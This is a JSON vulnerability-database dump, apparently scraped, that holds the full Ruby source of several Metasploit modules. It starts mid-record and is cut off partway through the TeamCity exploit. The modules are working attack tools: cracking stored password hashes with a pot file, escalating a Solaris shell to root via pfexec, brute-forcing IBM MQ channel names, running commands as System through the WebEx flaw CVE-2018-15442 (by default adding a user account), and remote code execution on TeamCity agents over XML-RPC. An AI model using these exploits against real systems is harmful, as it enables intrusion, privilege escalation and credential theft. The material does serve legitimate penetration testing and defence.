"published": "2019-02-03T15:17:25", "id": "MSF:AUXILIARY/ANALYZE/APPLY_POT", "href": "", "type": "metasploit", "title": "Apply Pot File To Hashes", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/auxiliary/password_cracker'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Auxiliary::PasswordCracker\n\n def initialize\n super(\n 'Name' => 'Apply Pot File To Hashes',\n 'Description' => %Q{\n This module uses a John the Ripper or Hashcat .pot file to crack any password\n hashes in the creds database instantly. 
JtR's --show functionality is used to\n help combine all the passwords into an easy to use format.\n },\n 'Author' => ['h00die'],\n 'License' => MSF_LICENSE\n )\n deregister_options('ITERATION_TIMEOUT')\n deregister_options('CUSTOM_WORDLIST')\n deregister_options('KORELOGIC')\n deregister_options('MUTATE')\n deregister_options('USE_CREDS')\n deregister_options('USE_DB_INFO')\n deregister_options('USE_DEFAULT_WORDLIST')\n deregister_options('USE_ROOT_WORDS')\n deregister_options('USE_HOSTNAMES')\n\n end\n\n # Not all hash formats include an 'id' field, which coresponds which db entry\n # an item is to its hash. This can be problematic, especially when a username\n # is used as a salt. Due to all the variations, we make a small HashLookup\n # class to handle all the fields for easier lookup later.\n class HashLookup\n attr_accessor :db_hash\n attr_accessor :jtr_hash\n attr_accessor :username\n attr_accessor :id\n\n def initialize(db_hash, jtr_hash, username, id)\n @db_hash = db_hash\n @jtr_hash = jtr_hash\n @username = username\n @id = id\n end\n end\n\n def run\n cracker = new_john_cracker\n\n lookups = []\n\n # create one massive hash file with all the hashes\n hashlist = Rex::Quickfile.new(\"hashes_tmp\")\n framework.db.creds(workspace: myworkspace).each do |core|\n next if core.private.type == 'Metasploit::Credential::Password'\n jtr_hash = hash_to_jtr(core)\n hashlist.puts jtr_hash\n lookups << HashLookup.new(core.private.data, jtr_hash, core.public, core.id)\n end\n hashlist.close\n cracker.hash_path = hashlist.path\n print_status \"Hashes Written out to #{hashlist.path}\"\n cleanup_files = [cracker.hash_path]\n\n # cycle through all hash types we dump asking jtr to show us\n # cracked passwords. 
The advantage to this vs just comparing\n # john.pot to the hashes directly is we use jtr to recombine\n # lanman, and other assorted nuances\n ['bcrypt', 'bsdicrypt', 'crypt', 'descrypt', 'lm', 'nt',\n 'md5crypt', 'mysql', 'mysql-sha1', 'mssql', 'mssql05', 'mssql12',\n 'oracle', 'oracle11', 'oracle12c', 'dynamic_1506', #oracles\n 'dynamic_1034' #postgres\n ].each do |format|\n\n print_status(\"Checking #{format} hashes against pot file\")\n cracker.format = format\n cracker.each_cracked_password do |password_line|\n password_line.chomp!\n next if password_line.blank? || password_line.nil?\n fields = password_line.split(\":\")\n core_id = nil\n case format\n when 'descrypt'\n next unless fields.count >=3\n username = fields.shift\n core_id = fields.pop\n 4.times { fields.pop } # Get rid of extra :\n when 'md5crypt', 'descrypt', 'bsdicrypt', 'crypt', 'bcrypt'\n next unless fields.count >=7\n username = fields.shift\n core_id = fields.pop\n 4.times { fields.pop }\n when 'mssql', 'mssql05', 'mssql12', 'mysql', 'mysql-sha1',\n 'oracle', 'dynamic_1506', 'oracle11', 'oracle12c'\n next unless fields.count >=3\n username = fields.shift\n core_id = fields.pop\n when 'dynamic_1506' #oracle H code\n next unless fields.count >=3\n username = fields.shift\n core_id = fields.pop\n when 'dynamic_1034' #postgres\n next unless fields.count >=2\n username = fields.shift\n password = fields.join(':')\n # unfortunately to match up all the fields we need to pull the hash\n # field as well, and it is only available in the pot file.\n pot = cracker.pot || cracker.john_pot_file\n\n File.open(pot, 'rb').each do |line|\n if line.start_with?('$dynamic_1034$') #postgres format\n lookups.each do |l|\n pot_hash = line.split(\":\")[0]\n raw_pot_hash = pot_hash.split('$')[2]\n if l.username.to_s == username &&\n l.jtr_hash == \"#{username}:$dynamic_1034$#{raw_pot_hash}\" &&\n l.db_hash == raw_pot_hash\n core_id = l.id\n break\n end\n end\n end\n end\n when 'lm', 'nt'\n next unless fields.count 
>=7\n username = fields.shift\n core_id = fields.pop\n 2.times{ fields.pop }\n # get the NT and LM hashes\n nt_hash = fields.pop\n lm_hash = fields.pop\n core_id = fields.pop\n password = fields.join(':')\n if format == 'lm'\n if password.blank?\n if nt_hash == Metasploit::Credential::NTLMHash::BLANK_NT_HASH\n password = ''\n else\n next\n end\n end\n password = john_lm_upper_to_ntlm(password, nt_hash)\n next if password.nil?\n end\n fields = password.split(':') #for consistency on the following join out of the case\n end\n unless core_id.nil?\n password = fields.join(':')\n print_good \"#{username}:#{password}\"\n create_cracked_credential( username: username, password: password, core_id: core_id)\n end\n end\n end\n if datastore['DeleteTempFiles']\n cleanup_files.each do |f|\n File.delete(f)\n end\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/analyze/apply_pot.rb"}, {"lastseen": "2019-10-23T20:30:15", "bulletinFamily": "exploit", "description": "This module attempts to upgrade a shell session to UID 0 using pfexec.\n", "modified": "2019-02-01T22:58:21", "published": "2019-02-01T22:58:21", "id": "MSF:POST/SOLARIS/ESCALATE/PFEXEC", "href": "", "type": "metasploit", "title": "Solaris pfexec Upgrade Shell", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::File\n include Msf::Post::Solaris::System\n include Msf::Post::Solaris::Priv\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Solaris pfexec Upgrade Shell',\n 'Description' => %q{\n This module attempts to upgrade a shell session to UID 0 using pfexec.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['bcoles'],\n 'Platform' => 'solaris',\n 'References' =>\n [\n ['URL', 
'https://docs.oracle.com/cd/E19253-01/816-4557/prbactm-1/index.html'],\n ['URL', 'http://www.c0t0d0s0.org/archives/4844-Less-known-Solaris-features-pfexec.html'],\n ['URL', 'http://solaris.wikia.com/wiki/Providing_root_privileges_with_pfexec']\n ],\n 'SessionTypes' => ['shell']\n ))\n register_options [\n OptString.new('PFEXEC_PATH', [true, 'Path to pfexec', '/usr/bin/pfexec']),\n OptString.new('SHELL_PATH', [true, 'Path to shell', '/bin/sh'])\n ]\n end\n\n def shell_path\n datastore['SHELL_PATH'].to_s\n end\n\n def pfexec_path\n datastore['PFEXEC_PATH'].to_s\n end\n\n def run\n unless session.type == 'shell'\n fail_with Failure::BadConfig, \"This module is not compatible with #{session.type} sessions\"\n end\n\n if is_root?\n fail_with Failure::BadConfig, 'Session already has root privileges'\n end\n\n unless command_exists? pfexec_path\n fail_with Failure::NotVulnerable, \"#{pfexec_path} does not exist\"\n end\n\n user = cmd_exec('id -un').to_s\n\n print_status \"Trying pfexec as `#{user}' ...\"\n\n res = cmd_exec \"#{pfexec_path} #{shell_path} -c id\"\n vprint_status res\n\n unless res.include? 'uid=0'\n fail_with Failure::NotVulnerable, \"User `#{user}' does not have permission to escalate with pfexec\"\n end\n\n print_good 'Success! Upgrading session ...'\n\n cmd_exec \"#{pfexec_path} #{shell_path}\"\n\n unless is_root?\n fail_with Failure::NotVulnerable, 'Failed to escalate'\n end\n\n print_good 'Success! root shell secured'\n report_note(\n :host => session,\n :type => 'host.escalation',\n :data => \"User `#{user}' pfexec'ed to a root shell\"\n )\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/solaris/escalate/pfexec.rb"}, {"lastseen": "2019-11-29T22:02:43", "bulletinFamily": "exploit", "description": "This module uses a dictionary to bruteforce MQ channel names. 
For all identified channels it also returns if SSL is used and whether it is a server-connection channel.\n", "modified": "2018-11-20T22:24:17", "published": "2018-10-28T15:22:27", "id": "MSF:AUXILIARY/SCANNER/MISC/IBM_MQ_CHANNEL_BRUTE", "href": "", "type": "metasploit", "title": "IBM WebSphere MQ Channel Name Bruteforce", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'IBM WebSphere MQ Channel Name Bruteforce',\n 'Description' => 'This module uses a dictionary to bruteforce MQ channel names. For all identified channels it also returns if SSL is used and whether it is a server-connection channel.',\n 'Author' => 'Petros Koutroumpis',\n 'License' => MSF_LICENSE\n )\n register_options([\n Opt::RPORT(1414),\n OptInt.new('TIMEOUT', [true, \"The socket connect timeout in seconds\", 10]),\n OptInt.new('CONCURRENCY', [true, \"The number of concurrent channel names to check\", 10]),\n OptPath.new('CHANNELS_FILE',\n [ true, \"The file that contains a list of channel names\"]\n )])\n end\n\n def create_packet(chan)\n packet = \"\\x54\\x53\\x48\\x20\"+ \t# StructID\n \"\\x00\\x00\\x01\\x0c\"+ \t\t# MQSegmLen\n \"\\x02\" +\t\t\t \t# Byte Order\n \"\\x01\" +\t\t\t \t# SegmType\n \"\\x01\" +\t\t\t\t# CtlFlag1\n \"\\x00\" +\t\t\t\t# CtlFlag2\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"+\t# LUWIdent\n \"\\x22\\x02\\x00\\x00\"+\t\t\t# Encoding\n \"\\xb5\\x01\" +\t\t\t# CCSID\n \"\\x00\\x00\" +\t\t\t# Reserved\n \"\\x49\\x44\\x20\\x20\" +\t\t# StructID\n \"\\x0d\" +\t\t\t\t# FAP Level\n \"\\x26\" +\t\t\t\t# CapFlag1 - Channel Type\n \"\\x00\" +\t\t\t\t# ECapFlag1\n \"\\x00\" +\t\t\t\t# IniErrFlg1\n \"\\x00\\x00\" +\t\t\t# Reserved\n \"\\x32\\x00\" +\t\t\t# MaxMsgBtch\n 
\"\\xec\\x7f\\x00\\x00\" +\t\t# MaxTrSize\n \"\\x00\\x00\\x40\\x00\" +\t\t# MaxMsgSize\n \"\\xff\\xc9\\x9a\\x3b\" +\t\t# SegWrapVal\n + chan + \t\t\t\t# Channel name\n \"\\x20\" +\t\t\t\t# CapFlag2\n \"\\x20\" +\t\t\t\t# ECapFlag2\n \"\\x20\\x20\" +\t\t\t# ccsid\n \"QM1\" + \"\\x20\"*45 +\t\t\t# Queue Manager Name\n \"\\x20\\x20\\x20\\x20\" +\t\t# HBInterval\n \"\\x20\\x20\" +\t\t\t# EFLLength\n \"\\x20\" +\t\t\t\t# IniErrFlg2\n \"\\x20\" +\t\t\t\t# Reserved1\n \"\\x20\\x20\" +\t\t\t# HdrCprLst\n \"\\x20\\x20\\x20\\x20\\x2c\\x01\\x00\\x00\"+ # MSGCprLst1\n \"\\x8a\\x00\\x00\\x55\\x00\\xff\\x00\\xff\"+ # MsgCprLst2\n \"\\xff\\xff\" +\t\t\t# Reserved2\n \"\\xff\\xff\\xff\\xff\" +\t\t# SSLKeyRst\n \"\\xff\\xff\\xff\\xff\" +\t\t# ConvBySKt\n \"\\xff\" +\t\t\t\t# CapFlag3\n \"\\xff\" +\t\t\t\t# ECapFlag3\n \"\\xff\\xff\" +\t\t\t# Reserved3\n \"\\x00\\x00\\x00\\x00\" +\t\t# ProcessId\n \"\\x00\\x00\\x00\\x00\" +\t\t# ThreadId\n \"\\x00\\x00\\x05\\x00\" +\t\t# TraceId\n \"\\x00\\x00\\x10\\x13\\x00\\x00\" + \t# ProdId\n \"\\x01\\x00\\x00\\x00\\x01\\x00\" + \t# ProdId\n \"MQMID\" + \"\\x20\"*43 +\t\t# MQM Id\n \"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\"+ # Unknown\n \"\\x20\\x20\\x20\\x20\\x20\\x20\\x00\\x00\"+ # Unknown\n \"\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\"+ # Unknown\n \"\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\"+ # Unknown\n \"\\xff\\xff\\x00\\x00\\x00\\x00\\x00\\x00\"+ # Unknown\n \"\\x00\\x00\\x00\\x00\\x00\\x00\"\t\t# Unknown\n end\n\n\n def run_host(ip)\n @channels = []\n @unencrypted_mqi_channels = []\n begin\n channel_list\n rescue ::Rex::ConnectionRefused\n fail_with(Failure::Unreachable, \"TCP Port closed.\")\n rescue ::Rex::ConnectionError, ::IOError, ::Timeout::Error, Errno::ECONNRESET\n fail_with(Failure::Unreachable, \"Connection Failed.\")\n rescue ::Exception => e\n fail_with(Failure::Unknown, e)\n end\n if(@channels.empty?)\n print_status(\"#{ip}:#{rport} No channels found.\")\n else\n print_good(\"Channels found: #{@channels}\")\n 
print_good(\"Unencrypted MQI Channels found: #{@unencrypted_mqi_channels}\")\n report_note(\n :host => rhost,\n :port => rport,\n :type => 'mq.channels'\n )\n print_line\n end\n end\n\n def channel_list\n channel_data = get_channel_names\n while (channel_data.length > 0)\n t = []\n r = []\n begin\n 1.upto(datastore['CONCURRENCY']) do\n this_channel = channel_data.shift\n if this_channel.nil?\n next\n end\n t << framework.threads.spawn(\"Module(#{self.refname})-#{rhost}:#{rport}\", false, this_channel) do |channel|\n connect\n vprint_status \"#{rhost}:#{rport} - Sending request for #{channel}...\"\n if channel.length.to_i > 20\n print_error(\"Channel names cannot exceed 20 characters. Skipping.\")\n next\n end\n chan = channel + \"\\x20\"*(20-channel.length.to_i)\n timeout = datastore['TIMEOUT'].to_i\n s = connect(false,\n {\n 'RPORT' => rport,\n 'RHOST' => rhost,\n }\n )\n s.put(create_packet(chan))\n data = s.get_once(-1,timeout)\n if data.nil?\n print_status(\"No response received. Try increasing timeout.\")\n next\n end\n if not data[0...3].include? 'TSH'\n next\n end\n if data[-4..-1] == \"\\x01\\x00\\x00\\x00\" # NO_CHANNEL code\n next\n end\n if data[-4..-1] == \"\\x18\\x00\\x00\\x00\" # CIPHER_SPEC code\n print_status(\"Found channel: #{channel}, IsEncrypted: True, IsMQI: N/A\")\n elsif data[-4..-1] == \"\\x02\\x00\\x00\\x00\" # CHANNEL_WRONG_TYPE code\n print_status(\"Found channel: #{channel}, IsEncrypted: False, IsMQI: False\")\n else\n print_status(\"Found channel: #{channel}, IsEncrypted: False, IsMQI: True\")\n @unencrypted_mqi_channels << channel\n end\n @channels << channel\n disconnect\n end\n end\n t.each {|x| x.join }\n end\n end\n end\n\n def get_channel_names\n if(! 
@common)\n File.open(datastore['CHANNELS_FILE'], \"rb\") do |fd|\n data = fd.read(fd.stat.size)\n @common = data.split(/\\n/).compact.uniq\n end\n end\n @common\n end\n\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/misc/ibm_mq_channel_brute.rb"}, {"lastseen": "2019-12-02T17:24:22", "bulletinFamily": "exploit", "description": "This module enables the execution of a single command as System by exploiting a remote code execution vulnerability in Cisco's WebEx client software.\n", "modified": "2018-10-24T21:18:17", "published": "2018-10-23T20:51:23", "id": "MSF:AUXILIARY/ADMIN/SMB/WEBEXEC_COMMAND", "href": "", "type": "metasploit", "title": "WebEx Remote Command Execution Utility", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::SMB::Client::WebExec\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n # Aliases for common classes\n SIMPLE = Rex::Proto::SMB::SimpleClient\n XCEPT = Rex::Proto::SMB::Exceptions\n CONST = Rex::Proto::SMB::Constants\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'WebEx Remote Command Execution Utility',\n 'Description' => %q{\n This module enables the execution of a single command as System by exploiting a remote\n code execution vulnerability in Cisco's WebEx client software.\n },\n\n 'Author' => [\n 'Ron Bowes <ron@skullsecurity.net>',\n ],\n\n 'License' => MSF_LICENSE,\n 'References' => [\n ['URL', 'https://webexec.org'],\n ['CVE', '2018-15442']\n ]\n ))\n\n register_options([\n OptString.new('COMMAND', [true, 'The command you want to execute on the remote host', 'net user testuser testpass /add']),\n OptPort.new('RPORT', [true, 'The Target port', 445]),\n OptBool.new('FORCE_GUI', [true, 'Ensure a GUI is created via 
wmic', false]),\n ])\n end\n\n # This is the main control method\n def run_host(ip)\n @smbshare = datastore['SMBSHARE']\n @ip = ip\n\n # Try and authenticate with given credentials\n if connect\n begin\n smb_login\n rescue Rex::Proto::SMB::Exceptions::Error => autherror\n print_error(\"Unable to authenticate with given credentials: #{autherror}\")\n return\n end\n\n command = datastore['COMMAND']\n if datastore['FORCE_GUI']\n command = \"WMIC PROCESS CALL Create \\\"#{command}\\\"\"\n end\n\n wexec(true) do |opts|\n execute_single_command(command, opts)\n end\n\n print_good(\"Command completed!\")\n disconnect\n end\n end\nend\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/smb/webexec_command.rb"}, {"lastseen": "2019-11-22T08:34:41", "bulletinFamily": "exploit", "description": "This module allows remote code execution on TeamCity Agents configured to use bidirectional communication via xml-rpc. In bidirectional mode the TeamCity server pushes build commands to the Build Agents over port TCP/9090 without requiring authentication. Up until version 10 this was the default configuration. 
This module supports TeamCity agents from version 6.0 onwards.\n", "modified": "2018-11-27T20:23:56", "published": "2018-08-28T08:35:17", "id": "MSF:EXPLOIT/MULTI/MISC/TEAMCITY_AGENT_XMLRPC_EXEC", "href": "", "type": "metasploit", "title": "TeamCity Agent XML-RPC Command Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'TeamCity Agent XML-RPC Command Execution',\n 'Description' => %q(\n This module allows remote code execution on TeamCity Agents configured\n to use bidirectional communication via xml-rpc. In bidirectional mode\n the TeamCity server pushes build commands to the Build Agents over port\n TCP/9090 without requiring authentication. Up until version 10 this was\n the default configuration. This module supports TeamCity agents from\n version 6.0 onwards.\n ),\n 'Author' => ['Dylan Pindur <dylanpindur@gmail.com>'],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['URL', 'https://www.tenable.com/plugins/nessus/94675']\n ],\n 'Platform' => %w[linux win],\n 'Targets' =>\n [\n ['Windows', { 'Platform' => 'win' }],\n ['Linux', { 'Platform' => 'linux' }]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Apr 14 2015'))\n\n deregister_options('SRVHOST', 'SRVPORT', 'URIPATH', 'VHOST')\n register_options(\n [\n Opt::RPORT(9090),\n OptString.new(\n 'CMD',\n [false, 'Execute this command instead of using command stager', '']\n )\n ]\n )\n end\n\n def check\n version = determine_version\n if !version.nil? 
&& version >= 15772\n Exploit::CheckCode::Appears\n else\n Exploit::CheckCode::Safe\n end\n end\n\n def exploit\n version = determine_version\n if version.nil?\n fail_with(Failure::NoTarget, 'Could not determine TeamCity Agent version')\n else\n print_status(\"Found TeamCity Agent running build version #{version}\")\n end\n\n unless datastore['CMD'].blank?\n print_status('Executing user supplied command')\n execute_command(datastore['CMD'], version)\n return\n end\n\n case target['Platform']\n when 'linux'\n linux_stager(version)\n when 'win'\n windows_stager(version)\n else\n fail_with(Failure::NoTarget, 'Unsupported target platform!')\n end\n end\n\n def windows_stager(version)\n print_status('Constructing Windows payload')\n\n stager = generate_cmdstager(\n flavor: :certutil,\n temp: '.',\n concat_operator: \"\\n\",\n nodelete: true\n ).join(\"\\n\")\n stager = stager.gsub(/^(?<exe>.{5}\\.exe)/, 'start \"\" \\k<exe>')\n\n xml_payload = build_request(stager, version)\n if xml_payload.nil?\n fail_with(Failure::NoTarget, \"No compatible build config for TeamCity build #{version}\")\n end\n\n print_status(\"Found compatible build config for TeamCity build #{version}\")\n send_request(xml_payload)\n end\n\n def linux_stager(version)\n print_status('Constructing Linux payload')\n\n stager = generate_cmdstager(\n flavor: :printf,\n temp: '.',\n concat_operator: \"\\n\",\n nodelete: true\n ).join(\"\\n\")\n stager << ' &'\n\n xml_payload = build_request(stager, version)\n if xml_payload.nil?\n fail_with(Failure::NoTarget, \"No compatible build config for TeamCity build #{version}\")\n end\n\n print_status(\"Found compatible build config for TeamCity build #{version}\")\n send_request(xml_payload)\n end\n\n def execute_command(cmd, version)\n xml_payload = build_request(cmd, version)\n\n if xml_payload.nil?\n fail_with(Failure::NoTarget, \"No compatible build config for TeamCity build #{version}\")\n end\n\n print_status(\"Found compatible build config for TeamCity build 
#{version}\")\n send_request(xml_payload)\n end\n\n def determine_version\n xml_payload = %(\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<methodCall>\n <methodName>buildAgent.getVersion</methodName>\n <params></params>\n</methodCall>\n )\n res = send_request_cgi(\n {\n 'uri' => '/',\n 'method' => 'POST',\n 'ctype' => 'text/xml',\n 'data' => xml_payload.strip!\n },\n 10\n )\n\n if !res.nil? && res.code == 200\n xml_doc = res.get_xml_document\n if xml_doc.errors.empty?\n val = xml_doc.xpath('/methodResponse/params/param/value')\n if val.length == 1\n return val.text.to_i\n end\n end\n end\n return nil\n end\n\n def send_request(xml_payload)\n res = send_request_cgi(\n {\n 'uri' => '/',\n 'method' => 'POST',\n 'ctype' => 'text/xml',\n 'data' => xml_payload\n },\n 10\n )\n\n if !res.nil? && res.code == 200\n print_status(\"Successfully sent build configuration\")\n else\n print_status(\"Failed to send build configuration\")\n end\n end\n\n def build_request(script_content, version)\n case version\n when 0..15771\n return nil\n when 15772..17794\n return req_teamcity_6(script_content)\n when 17795..21240\n return req_teamcity_6_5(script_content)\n when 21241..27401\n return req_teamcity_7(script_content)\n when 27402..32059\n return req_teamcity_8(script_content)\n when 32060..42001\n return req_teamcity_9(script_content)\n when 42002..46532\n return req_teamcity_10(script_content)\n else\n return req_teamcity_2017(script_content)\n end\n end\n\n def req_teamcity_2017(script_content)\n build_code = Rex::Text.rand_text_alpha(8)\n build_id = Rex::Text.rand_text_numeric(8)\n xml_payload = %(\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<methodCall>\n <methodName>buildAgent.runBuild</methodName>\n <params>\n <param>\n <value>\n <![CDATA[\n <AgentBuild>\n <myBuildId>#{build_id}</myBuildId>\n <myBuildTypeId>x</myBuildTypeId>\n <myBuildTypeExternalId>x</myBuildTypeExternalId>\n <myCheckoutType>ON_AGENT</myCheckoutType>\n 
<myVcsSettingsHashForServerCheckout>x</myVcsSettingsHashForServerCheckout>\n <myVcsSettingsHashForAgentCheckout>#{build_code}</myVcsSettingsHashForAgentCheckout>\n <myVcsSettingsHashForManualCheckout>x</myVcsSettingsHashForManualCheckout>\n <myDefaultExecutionTimeout>3</myDefaultExecutionTimeout>\n <myServerParameters class=\"StringTreeMap\">\n <k>system.build.number</k>\n <v>0</v>\n </myServerParameters>\n <myAccessCode/>\n <myArtifactDependencies/>\n <myArtifactPaths/>\n <myArtifactStorageSettings/>\n <myBuildFeatures/>\n <myBuildTypeOptions/>\n <myFullCheckoutReasons/>\n <myParametersSpecs class=\"StringTreeMap\"/>\n <myPersonalVcsChanges/>\n <myUserBuildParameters/>\n <myVcsChanges/>\n <myVcsRootCurrentRevisions class=\"tree-map\"/>\n <myVcsRootEntries/>\n <myVcsRootOldRevisions class=\"tree-map\"/>\n <myBuildRunners>\n <jetbrains.buildServer.agentServer.BuildRunnerData>\n <myId>x</myId>\n <myIsDisabled>false</myIsDisabled>\n <myRunType>simpleRunner</myRunType>\n <myRunnerName>x</myRunnerName>\n <myChildren class=\"list\"/>\n <myServerParameters class=\"tree-map\">\n <entry>\n <string>teamcity.build.step.name</string>\n <string>x</string>\n </entry>\n </myServerParameters>\n <myRunnerParameters class=\"tree-map\">\n <entry>\n <string>script.content</string>\n <string>#{script_content}</string>\n </entry>\n <entry>\n <string>teamcity.step.mode</string>\n <string>default</string>\n </entry>\n <entry>\n <string>use.custom.script</string>\n <string>true</string>\n </entry>\n </myRunnerParameters>\n </jetbrains.buildServer.agentServer.BuildRunnerData>\n </myBuildRunners>\n </AgentBuild>\n ]]>\n </value>\n </param>\n </params>\n</methodCall>\n )\n return xml_payload.strip!\n end\n\n def req_teamcity_10(script_content)\n build_code = Rex::Text.rand_text_alpha(8)\n build_id = Rex::Text.rand_text_numeric(8)\n xml_payload = %(\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<methodCall>\n <methodName>buildAgent.runBuild</methodName>\n <params>\n <param>\n <value>\n 
<![CDATA[\n <AgentBuild>\n <myBuildId>#{build_id}</myBuildId>\n <myBuildTypeId>x</myBuildTypeId>\n <myBuildTypeExternalId>x</myBuildTypeExternalId>\n <myCheckoutType>ON_AGENT</myCheckoutType>\n <myVcsSettingsHashForServerCheckout>x</myVcsSettingsHashForServerCheckout>\n <myVcsSettingsHashForAgentCheckout>#{build_code}</myVcsSettingsHashForAgentCheckout>\n <myVcsSettingsHashForManualCheckout>x</myVcsSettingsHashForManualCheckout>\n <myDefaultExecutionTimeout>3</myDefaultExecutionTimeout>\n <myServerParameters class=\"StringTreeMap\">\n <k>system.build.number</k>\n <v>0</v>\n </myServerParameters>\n <myAccessCode/>\n <myArtifactDependencies/>\n <myArtifactPaths/>\n <myBuildFeatures/>\n <myBuildTypeOptions/>\n <myFullCheckoutReasons/>\n <myParametersSpecs class=\"StringTreeMap\"/>\n <myPersonalVcsChanges/>\n <myUserBuildParameters/>\n <myVcsChanges/>\n <myVcsRootCurrentRevisions class=\"tree-map\"/>\n <myVcsRootEntries/>\n <myVcsRootOldRevisions class=\"tree-map\"/>\n <myBuildRunners>\n <jetbrains.buildServer.agentServer.BuildRunnerData>\n <myId>x</myId>\n <myIsDisabled>false</myIsDisabled>\n <myRunType>simpleRunner</myRunType>\n <myRunnerName>x</myRunnerName>\n <myChildren class=\"list\"/>\n <myServerParameters class=\"tree-map\">\n <entry>\n <string>teamcity.build.step.name</string>\n <string>x</string>\n </entry>\n </myServerParameters>\n <myRunnerParameters class=\"tree-map\">\n <entry>\n <string>script.content</string>\n <string>#{script_content}</string>\n </entry>\n <entry>\n <string>teamcity.step.mode</string>\n <string>default</string>\n </entry>\n <entry>\n <string>use.custom.script</string>\n <string>true</string>\n </entry>\n </myRunnerParameters>\n </jetbrains.buildServer.agentServer.BuildRunnerData>\n </myBuildRunners>\n </AgentBuild>\n ]]>\n </value>\n </param>\n </params>\n</methodCall>\n )\n return xml_payload.strip!\n end\n\n def req_teamcity_9(script_content)\n build_id = Rex::Text.rand_text_numeric(8)\n xml_payload = %(\n<?xml version=\"1.0\" 
encoding=\"UTF-8\"?>\n<methodCall>\n <methodName>buildAgent.runBuild</methodName>\n <params>\n <param>\n <value>\n <![CDATA[\n <AgentBuild>\n <myBuildId>#{build_id}</myBuildId>\n <myBuildTypeId>x</myBuildTypeId>\n <myBuildTypeExternalId>x</myBuildTypeExternalId>\n <myCheckoutType>ON_AGENT</myCheckoutType>\n <myDefaultCheckoutDirectory>x</myDefaultCheckoutDirectory>\n <myDefaultExecutionTimeout>3</myDefaultExecutionTimeout>\n <myServerParameters class=\"StringTreeMap\">\n <k>system.build.number</k>\n <v>0</v>\n </myServerParameters>\n <myAccessCode/>\n <myArtifactDependencies/>\n <myArtifactPaths/>\n <myBuildFeatures/>\n <myBuildTypeOptions/>\n <myFullCheckoutReasons/>\n <myPersonalVcsChanges/>\n <myUserBuildParameters/>\n <myVcsChanges/>\n <myVcsRootCurrentRevisions class=\"tree-map\"/>\n <myVcsRootEntries/>\n <myVcsRootOldRevisions class=\"tree-map\"/>\n <myBuildRunners>\n <jetbrains.buildServer.agentServer.BuildRunnerData>\n <myId>x</myId>\n <myIsDisabled>false</myIsDisabled>\n <myRunType>simpleRunner</myRunType>\n <myRunnerName>x</myRunnerName>\n <myChildren class=\"list\"/>\n <myServerParameters class=\"tree-map\">\n <entry>\n <string>teamcity.build.step.name</string>\n <string>x</string>\n </entry>\n </myServerParameters>\n <myRunnerParameters class=\"tree-map\">\n <entry>\n <string>script.content</string>\n <string>#{script_content}</string>\n </entry>\n <entry>\n <string>teamcity.step.mode</string>\n <string>default</string>\n </entry>\n <entry>\n <string>use.custom.script</string>\n <string>true</string>\n </entry>\n </myRunnerParameters>\n </jetbrains.buildServer.agentServer.BuildRunnerData>\n </myBuildRunners>\n </AgentBuild>\n ]]>\n </value>\n </param>\n </params>\n</methodCall>\n )\n return xml_payload.strip!\n end\n\n def req_teamcity_8(script_content)\n build_id = Rex::Text.rand_text_numeric(8)\n xml_payload = %(\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<methodCall>\n <methodName>buildAgent.runBuild</methodName>\n <params>\n <param>\n <value>\n 
